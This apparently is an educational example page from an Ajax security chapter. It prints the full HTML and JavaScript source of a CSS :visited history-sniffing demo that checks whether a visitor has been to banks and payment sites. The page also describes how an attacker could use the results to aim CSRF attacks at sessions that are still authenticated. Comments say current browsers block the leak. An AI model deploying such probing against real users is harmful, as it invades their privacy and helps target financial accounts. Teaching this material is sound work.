
Examples: History Stealing

Stealing History with JavaScript and CSS



We will check for history of the following sites:
  • http://www.google.com/
  • https://ajaxref.com/ch7/history.html
  • https://www.wellsfargo.com/
  • http://www.bankofamerica.com/
  • http://www.washingtonmutual.com/
  • http://www.amazon.com/
  • https://home.americanexpress.com/
  • https://www.paypal.com/





  • Scenarios

    An attacker's page, or a legitimate site compromised through XSS, can embed this history-checking script to learn which of the listed sites you have visited. Knowing where you are likely to hold a live, cookie-authenticated session, it can then mount a targeted CSRF attack against that site in your name. (Current browsers restrict what script can read back about :visited link styling precisely to block this check, so the demo as written only works in older browsers.)

    Note: The example checks only a few sites, but the same loop can test a large list in well under a second, or retrieve the list of sites or URLs to test from the attacker's server via a communications request (XMLHttpRequest).

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Chapter 7 : Security - History</title>
    <link rel="stylesheet" href="https://ajaxref.com/ch7/global.css" type="text/css" media="screen" />
    <style type="text/css">
     
        a.stealhistory:link{color:#FF0000}
        a.stealhistory:visited{color:#00FF00}
    </style>
    <script src="https://ajaxref.com/ch7/utilities.js" type="text/javascript">
    </script>
    <script type="text/javascript">
     
     
     
    function getHistoryLength()
    {
        // Show how many entries the tab's session history holds. Script can
        // read the count (window.history.length) but not the entries themselves;
        // the count alone already hints how much the user has browsed in this tab.
        var total = window.history.length;
        var target = document.getElementById("responseOutput");
        var label = "<strong>Length of History through Javascript: </strong>";
        target.innerHTML = label + total;
    }
     
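    function getHistory(stealhistorysites)
    {
        // Report which of the candidate URLs the browser currently styles as
        // :visited (see checkHistory). Matching entries are appended as text
        // nodes rather than via innerHTML: the onload handler notes that the
        // URL list may be fetched remotely, so an entry must never be parsed
        // as markup. Building nodes also avoids re-parsing the whole output
        // fragment on every iteration that `innerHTML +=` causes.
        var sites = stealhistorysites || [];
        var responseOutput = document.getElementById("responseOutput");
        responseOutput.innerHTML = "<strong>Checking History through Javascript/CSS. </strong><br />";
        responseOutput.innerHTML += "<br /><strong>You have been to: </strong><br />";
        for (var i = 0; i < sites.length; i++)
        {
            if (checkHistory(sites[i]))
            {
                responseOutput.appendChild(document.createTextNode(sites[i]));
                responseOutput.appendChild(document.createElement("br"));
            }
        }
    }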
     
    function checkHistory(url) 
    {
        // Infer whether `url` is in the browser history: insert a hidden anchor
        // pointing at it and read back the computed colour. The stylesheet in
        // <head> paints a.stealhistory:visited #00FF00 and :link #FF0000, so a
        // green probe means "visited". The anchor is removed again before return.
        // NOTE(review): current browsers deliberately report the :link colour for
        // :visited anchors to script, so on a recent browser this returns false
        // regardless of history; it demonstrates the original leak, not a live one.
        var probe = document.createElement("a");
        probe.className = "stealhistory";
        probe.href = url;
        probe.appendChild(document.createTextNode("stealhistory"));
        probe.style.visibility = "hidden";
        document.body.appendChild(probe);

        // getStyle comes from utilities.js; colour string format varies by
        // browser, hence both the rgb() and hex spellings are accepted.
        var computed = getStyle(probe, "color").toLowerCase();
        document.body.removeChild(probe);

        return computed === "rgb(0, 255, 0)" || computed === "#00ff00";
    }
     
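    window.onload = function() 
    { 
        // Candidate URLs to probe. Hard-coded for the demo; an attacker would
        // more likely pull this list from a remote communication request, which
        // is why the rendering below treats every entry as text, not HTML.
        var stealhistorysites = ["http://www.google.com/", "https://ajaxref.com/ch7/history.html", "https://www.wellsfargo.com/", "http://www.bankofamerica.com/", "http://www.washingtonmutual.com/", "http://www.amazon.com/", "https://home.americanexpress.com/", "https://www.paypal.com/"];

        document.requestForm.checkHistoryLength.onclick = function() { getHistoryLength(); };
        document.requestForm.checkVisited.onclick = function() { getHistory(stealhistorysites); };

        // Build the "sites we will check" list with DOM nodes: `innerHTML +=`
        // re-parses the whole fragment on each iteration and would interpret
        // any markup contained in an attacker-supplied URL.
        var websites = document.getElementById("websites");
        websites.innerHTML = "<strong>We will check for history of the following sites:</strong>";
        var list = document.createElement("ul");
        for (var i = 0; i < stealhistorysites.length; i++)
        {
            var item = document.createElement("li");
            item.appendChild(document.createTextNode(stealhistorysites[i]));
            list.appendChild(item);
        }
        websites.appendChild(list);
        websites.appendChild(document.createElement("br"));
    }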
    </script>
     
    </head>
    <body>
    <div class="content">
    <h1>Stealing History with JavaScript and CSS</h1><br />
    <form action="#" name="requestForm">
        <input type="button" value="Check History Length" name="checkHistoryLength" />
        <input type="button" value="Check for Visited URLs" name="checkVisited"  />
    </form>
    </div>
     
    <br />
    <div id="websites" class="response"></div>
    <br /><br />
    <div id="responseOutput" class="response"></div>
     
    <br /><br />
    <div id="scenarios">
        <h3>Scenarios</h3>
        <p>An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them.  They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.</p>
        <p><em>Note:</em> The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.</p>
    </div>
    </body>
    </html>